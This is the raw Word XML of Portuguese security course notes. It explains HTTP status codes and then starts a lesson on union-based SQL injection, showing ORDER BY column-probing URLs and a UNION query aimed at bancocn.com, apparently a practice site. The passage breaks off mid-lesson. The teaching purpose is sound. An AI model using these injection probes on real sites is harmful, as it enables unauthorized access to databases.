            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="185939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4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0637" cy="186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16FD" w14:textId="77777777" w:rsidR="000633B5" w:rsidRPr="00711C8C" w:rsidRDefault="000633B5" w:rsidP="00805CA0">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B0C4EED" w14:textId="79309423" w:rsidR="00D46A35" w:rsidRDefault="000633B5" w:rsidP="00805CA0">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Através disso, pode ser explorado diversos outros ataques.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67BEED08" w14:textId="3E012025" w:rsidR="00D46A35" w:rsidRDefault="00D46A35" w:rsidP="00D46A35">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Status Codes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9A4B9C" w14:textId="18DA05C0" w:rsidR="00D46A35" w:rsidRDefault="00D46A35" w:rsidP="00D46A35"/>
    <w:p w14:paraId="04B4B67A" w14:textId="4884C0AD" w:rsidR="00D46A35" w:rsidRPr="00D46A35" w:rsidRDefault="00D46A35" w:rsidP="002870C8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200 OK</w:t>
      </w:r>
      <w:r w:rsidR="002870C8" w:rsidRPr="003B7054">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="002870C8" w:rsidRPr="003B7054">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C90F9C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a requisição foi bem-sucedida.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73688A5E" w14:textId="77777777" w:rsid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O servidor retorna os dados solicitados.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69403041" w14:textId="77777777" w:rsidR="003B7054" w:rsidRPr="00D46A35" w:rsidRDefault="003B7054" w:rsidP="003B7054">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C9128EB" w14:textId="77777777" w:rsidR="00D46A35" w:rsidRPr="00D46A35" w:rsidRDefault="00D46A35" w:rsidP="002870C8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201 Created</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37DB8116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a requisição foi bem-sucedida e resultou na criação de um novo recurso.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF3E7EE" w14:textId="77777777" w:rsid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Após uma requisição POST para criar um novo usuário, o servidor retorna este código junto com os detalhes do novo usuário.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9D7074" w14:textId="77777777" w:rsidR="003B7054" w:rsidRPr="00D46A35" w:rsidRDefault="003B7054" w:rsidP="003B7054">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A15857A" w14:textId="77777777" w:rsidR="00D46A35" w:rsidRPr="00D46A35" w:rsidRDefault="00D46A35" w:rsidP="002870C8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204 No Content</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26AE8871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a requisição foi bem-sucedida, mas não há conteúdo para ser retornado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B518EA" w14:textId="77777777" w:rsid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Uma requisição de remoção de um recurso.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="439DAAB0" w14:textId="77777777" w:rsidR="003B7054" w:rsidRPr="00D46A35" w:rsidRDefault="003B7054" w:rsidP="003B7054">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E8995E3" w14:textId="77777777" w:rsidR="00D46A35" w:rsidRPr="00D46A35" w:rsidRDefault="00D46A35" w:rsidP="002870C8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400 Bad Request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F47E6E0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a requisição do cliente é inválida ou malformada.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14710F2C" w14:textId="77777777" w:rsid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Parâmetros de requisição ausentes ou inválidos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E478099" w14:textId="77777777" w:rsidR="003B7054" w:rsidRPr="00D46A35" w:rsidRDefault="003B7054" w:rsidP="003B7054">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="505FBEC2" w14:textId="77777777" w:rsidR="00D46A35" w:rsidRPr="00D46A35" w:rsidRDefault="00D46A35" w:rsidP="002870C8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401 Unauthorized</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04260607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o cliente deve se autenticar para obter a resposta solicitada.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C1DD16" w14:textId="77777777" w:rsid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Tentativa de acessar uma API sem fornecer credenciais válidas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E86E11B" w14:textId="77777777" w:rsidR="003B7054" w:rsidRPr="00D46A35" w:rsidRDefault="003B7054" w:rsidP="003B7054">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="454B64B7" w14:textId="77777777" w:rsidR="00D46A35" w:rsidRPr="00D46A35" w:rsidRDefault="00D46A35" w:rsidP="002870C8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403 Forbidden</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7863A482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o servidor entende a requisição, mas o acesso é proibido.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21AAFBE0" w14:textId="77777777" w:rsid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Tentativa de acesso a um recurso sem as permissões adequadas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036D7B1F" w14:textId="77777777" w:rsidR="003B7054" w:rsidRPr="00D46A35" w:rsidRDefault="003B7054" w:rsidP="003B7054">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="378D828A" w14:textId="77777777" w:rsidR="00D46A35" w:rsidRPr="00D46A35" w:rsidRDefault="00D46A35" w:rsidP="002870C8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404 Not Found</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD5AA85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o recurso solicitado não foi encontrado no servidor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6735C4C2" w14:textId="77777777" w:rsidR="003B7054" w:rsidRDefault="00D46A35" w:rsidP="003B7054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A tentativa de acessar uma URL inexistente.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EBD0FAC" w14:textId="77777777" w:rsidR="003B7054" w:rsidRDefault="003B7054" w:rsidP="003B7054">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28D82771" w14:textId="44D29D4E" w:rsidR="003B7054" w:rsidRPr="00903BBB" w:rsidRDefault="003B7054" w:rsidP="003B7054">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B7054">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>406 Not Acceptable</w:t>
      </w:r>
      <w:r w:rsidR="00BE097E">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (Não aceita a requisição)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076DDFBD" w14:textId="77777777" w:rsidR="003B7054" w:rsidRPr="003B7054" w:rsidRDefault="003B7054" w:rsidP="003B7054">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B7054">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Explicação</w:t>
      </w:r>
      <w:r w:rsidRPr="003B7054">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t>: Indica que o servidor não é capaz de fornecer uma representação do recurso que pode ser aceita pelo cliente, com base nos cabeçalhos "Accept" presentes na requisição.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C4332B3" w14:textId="1D2D064B" w:rsidR="003B7054" w:rsidRPr="003B7054" w:rsidRDefault="003B7054" w:rsidP="003B7054">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B7054">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exemplo:</w:t>
      </w:r>
      <w:r w:rsidRPr="003B7054">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t xml:space="preserve"> Um cliente solicita um recurso com um cabeçalho "Accept" que o servidor não consegue atender.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A784F0" w14:textId="77777777" w:rsidR="00233171" w:rsidRDefault="00233171" w:rsidP="003B7054">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="298E369A" w14:textId="436E8315" w:rsidR="00D46A35" w:rsidRPr="00D46A35" w:rsidRDefault="00D46A35" w:rsidP="003B7054">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D46A35">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>500 Internal Server Error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD17E00" w14:textId="77777777" w:rsidR="00D46A35" w:rsidRPr="00D46A35" w:rsidRDefault="00D46A35" w:rsidP="00D46A35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um erro genérico no servidor que impede o atendimento da requisição.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF15156" w14:textId="6331AF84" w:rsidR="00D46A35" w:rsidRPr="003B7054" w:rsidRDefault="00D46A35" w:rsidP="002870C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3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Problemas no código do servidor ou falhas inesperadas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A996AAC" w14:textId="77777777" w:rsidR="00D46A35" w:rsidRDefault="00D46A35" w:rsidP="002870C8">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53A32BA2" w14:textId="77777777" w:rsidR="00D46A35" w:rsidRPr="00D46A35" w:rsidRDefault="00D46A35" w:rsidP="00D46A35">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D46A35">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>301 Moved Permanently</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35CDBB6C" w14:textId="77777777" w:rsidR="00D46A35" w:rsidRPr="00D46A35" w:rsidRDefault="00D46A35" w:rsidP="00D46A35">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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o recurso solicitado foi movido permanentemente para uma nova localização.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309BE258" w14:textId="77777777" w:rsidR="00D46A35" w:rsidRPr="00D46A35" w:rsidRDefault="00D46A35" w:rsidP="00D46A35">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Um site alterou sua estrutura de URLs, e as requisições antigas são redirecionadas para as novas URLs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57BE84ED" w14:textId="7F1064D9" w:rsidR="00D46A35" w:rsidRPr="003B7054" w:rsidRDefault="00D46A35" w:rsidP="00D46A35">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="506F0C02" w14:textId="77777777" w:rsidR="00D46A35" w:rsidRPr="00D46A35" w:rsidRDefault="00D46A35" w:rsidP="00D46A35">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D46A35">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>302 Found (ou Moved Temporarily)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2C912D" w14:textId="77777777" w:rsidR="00D46A35" w:rsidRPr="00D46A35" w:rsidRDefault="00D46A35" w:rsidP="00D46A35">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Explicação:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D46A35">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t xml:space="preserve"> Indica que o recurso solicitado foi temporariamente movido para uma nova localização. Os clientes devem continuar usando a URI original para futuras requisições.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCA4D20" w14:textId="77777777" w:rsidR="00D46A35" w:rsidRPr="00D46A35" w:rsidRDefault="00D46A35" w:rsidP="00D46A35">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D46A35">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exemplo:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D46A35">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t xml:space="preserve"> Um redirecionamento temporário, como uma página de manutenção temporária ou redirecionamento para uma versão temporária de um site.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="023A4114" w14:textId="77777777" w:rsidR="00D46A35" w:rsidRPr="00D46A35" w:rsidRDefault="00D46A35" w:rsidP="00D46A35"/>
    <w:p w14:paraId="11EDAC38" w14:textId="65F49458" w:rsidR="00924F98" w:rsidRDefault="00945CE0" w:rsidP="00924F98">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_Toc156597602"/>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
        <w:t>Aula 8 – SQL Injection – Atacando o Servidor</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p w14:paraId="5B998BFD" w14:textId="77777777" w:rsidR="00924F98" w:rsidRDefault="00924F98" w:rsidP="00924F98"/>
    <w:p w14:paraId="6ECF65D5" w14:textId="37D68CCC" w:rsidR="002844BF" w:rsidRPr="002844BF" w:rsidRDefault="002844BF" w:rsidP="00924F98">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002844BF">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t>Código do site bancocn.com, ele busca pelas páginas e mostra seu conteúdo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19DD4727" w14:textId="77777777" w:rsidR="002844BF" w:rsidRDefault="002844BF" w:rsidP="00924F98"/>
    <w:p w14:paraId="30A743E3" w14:textId="1BE4378E" w:rsidR="002844BF" w:rsidRDefault="002844BF" w:rsidP="002844BF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="09F263C9" wp14:editId="398E7EDD">
            <wp:extent cx="6168233" cy="3179135"/>
            <wp:effectExtent l="0" t="0" r="4445" b="2540"/>
            <wp:docPr id="1912861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610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3018" cy="31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B3A6" w14:textId="77777777" w:rsidR="008D18A8" w:rsidRDefault="008D18A8" w:rsidP="002844BF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4094662E" w14:textId="167EA717" w:rsidR="00646097" w:rsidRDefault="008D18A8" w:rsidP="00A74DF3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t xml:space="preserve">No bancocn.com, como as informações do SQL são mostradas na tela, é possível fazer o ataque de SQL Injection chamado </w:t>
      </w:r>
      <w:r w:rsidRPr="008D18A8">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Union-Based</w:t>
      </w:r>
      <w:r w:rsidR="00876AAD">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EEC1EAA" w14:textId="4C615BBD" w:rsidR="00876AAD" w:rsidRDefault="00876AAD" w:rsidP="002844BF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t xml:space="preserve">Para aplicar a técnica de Union-Based, você precisa saber primeiro nº colunas que é retornado no SQL, pois o </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>union</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t xml:space="preserve"> deve ter o mesmo nº colunas entre as duas consultas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542264D3" w14:textId="77777777" w:rsidR="00876AAD" w:rsidRDefault="00876AAD" w:rsidP="002844BF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25307553" w14:textId="3BD8ADF1" w:rsidR="00876AAD" w:rsidRDefault="00876AAD" w:rsidP="002844BF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B1ABB">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Exemplo:</w:t>
      </w:r>
      <w:r w:rsidRPr="00876AAD">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008B1ABB">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00876AAD">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SELECT * FROM categories W</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">HERE id=1 </w:t>
      </w:r>
      <w:r w:rsidR="008E18A0">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SELECT * FROM categories WHERE id = 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073A064F" w14:textId="14AA4D87" w:rsidR="00876AAD" w:rsidRDefault="00876AAD" w:rsidP="002844BF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00876AAD">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t>Vai retornar o mesmo n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t>º colunas nas duas consultas unidas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1109F15C" w14:textId="77777777" w:rsidR="008B1ABB" w:rsidRDefault="008B1ABB" w:rsidP="002844BF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="169944BC" w14:textId="0295C3CE" w:rsidR="008B1ABB" w:rsidRDefault="008B1ABB" w:rsidP="008B1ABB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B1ABB">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Técnica:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:tab/>
        <w:t>Supondo que você não sabe, quantas colunas tem, um jeito de descobrir, seria:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41BD4A5C" w14:textId="1AC6D635" w:rsidR="001E272A" w:rsidRDefault="008B1ABB" w:rsidP="008B1ABB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:hyperlink r:id="rId44" w:history="1">
        <w:r w:rsidRPr="008B1ABB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://bancocn.com/cat.php?id=1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="008B1ABB">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> ORDER BY 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D69B2A" w14:textId="5BDD0E73" w:rsidR="001E272A" w:rsidRDefault="001E272A" w:rsidP="001E272A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:hyperlink r:id="rId45" w:history="1">
        <w:r w:rsidRPr="008B1ABB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://bancocn.com/cat.php?id=1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="008B1ABB">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> ORDER BY </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="321BDDD0" w14:textId="126F80F1" w:rsidR="001E272A" w:rsidRDefault="001E272A" w:rsidP="001E272A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:hyperlink r:id="rId46" w:history="1">
        <w:r w:rsidRPr="008B1ABB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
